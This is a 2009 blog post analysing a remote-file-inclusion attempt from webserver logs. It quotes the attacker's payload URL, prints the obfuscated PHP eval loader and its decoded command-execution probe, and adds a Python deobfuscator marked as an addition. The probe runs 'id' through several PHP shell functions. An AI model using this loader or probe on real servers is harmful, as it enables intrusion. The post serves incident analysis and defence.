1337 v0pCr3w – heh

Posted on 11 May 2009

Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.

It was an attempt to remotely load the following URL on the Aanval.com primary domain:

http://oubkhammuseum.com/templates/idvop.txt

The content of the URL (in the event it gets pulled):

[code lang="php"]<?php
// Obfuscated loader: the string below is the real PHP, run through
// raw deflate, then str_rot13, then base64 (in that order).
$vopcrew = "pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=";
// The decode chain is applied in reverse, then eval() executes the recovered source.
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;[/code]

And of course, the decoded PHP version that they would prefer to have executed:

[code lang="php"]$os = @PHP_OS;
echo "v0pCr3w";          // banner so the scanner can confirm the code ran
echo "os:$os";           // reports the operating system
$cmd = "id";             // shell command: who is the web server running as?
$eseguicmd = ex($cmd);
echo $eseguicmd;

// Try every command-execution function PHP might expose, in turn,
// until one is not disabled. Errors are suppressed with @ to stay quiet.
function ex($cfe){

$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}[/code]

Essentially, it is an attempt to identify the user the web server process is running under (and, via PHP_OS, the operating system). As you can see, they define the function ex(), which is a simple if / elseif chain that tries each command-execution function PHP might have available (exec, shell_exec, system, passthru and finally popen) until one succeeds at running the shell command "id" and returns its output.
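To see what a loader of this shape would hand to eval() without executing any of it, here is an added Python example (not code from the original post or from the logged payload) that statically reverses the base64_decode / str_rot13 / gzinflate chain. The build_loader() helper and the inner string it wraps are constructed for the demonstration only.

```python
import base64
import codecs
import re
import zlib

# Shape of the loader quoted above: eval(gzinflate(str_rot13(base64_decode($var))));
LOADER_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)\s*\)\s*\)',
    re.S,
)


def php_gzinflate(data: bytes) -> bytes:
    # PHP gzinflate() is raw DEFLATE with no zlib/gzip header; wbits=-15 selects that.
    return zlib.decompress(data, -15)


def php_str_rot13(data: bytes) -> bytes:
    # str_rot13 only shifts A-Z/a-z; latin-1 round-trips every other byte unchanged.
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")


def unwrap_loader(src: str):
    """Undo the decode chain and return the PHP that eval() would run, without running it.
    Returns None when the loader shape or its string variable is not present."""
    m = LOADER_RE.search(src)
    if not m:
        return None
    s = re.search(r'\$%s\s*=\s*["\']([^"\']*)["\']\s*;' % re.escape(m.group(1)), src, re.S)
    if not s:
        return None
    blob = re.sub(r"\s+", "", s.group(1))  # PHP base64_decode() skips whitespace, so wrapped lines are fine
    return php_gzinflate(php_str_rot13(base64.b64decode(blob))).decode("utf-8", "replace")


def build_loader(inner_php: str) -> str:
    """Apply the same chain forwards (gzdeflate -> str_rot13 -> base64) to build a constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(inner_php.encode("utf-8")) + comp.flush()
    blob = base64.b64encode(php_str_rot13(deflated)).decode("ascii")
    return '$v = "%s";\neval(gzinflate(str_rot13(base64_decode($v))));\nexit;' % blob


if __name__ == "__main__":
    # Constructed, harmless inner string used only to exercise the unwrapper.
    sample = build_loader('echo "constructed sample";')
    print(unwrap_loader(sample))
```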

A quick search around the net turned up the little Perl scanner tool that was used:

http://www.loyalmoses.com/junk/vopcrew_multiscanner.txt

The offending IP apparently belongs to HostMySite, which owns a good-sized net block:

208.112.87.9

OrgName: HostMySite
Address: 650 Pencader Drive
City: Newark
StateProv: DE
PostalCode: 19702
Country: US

Rather amateurish, but effective. 😉


1 Response to 1337 v0pCr3w – heh

  • gigi says:

    Hi,
    I have got the same problem, but does this mean that they have tried to download that file onto my server, or that they have verified it was already on my server?

    Regards
    Gigi

    Copyright © Loyal Moses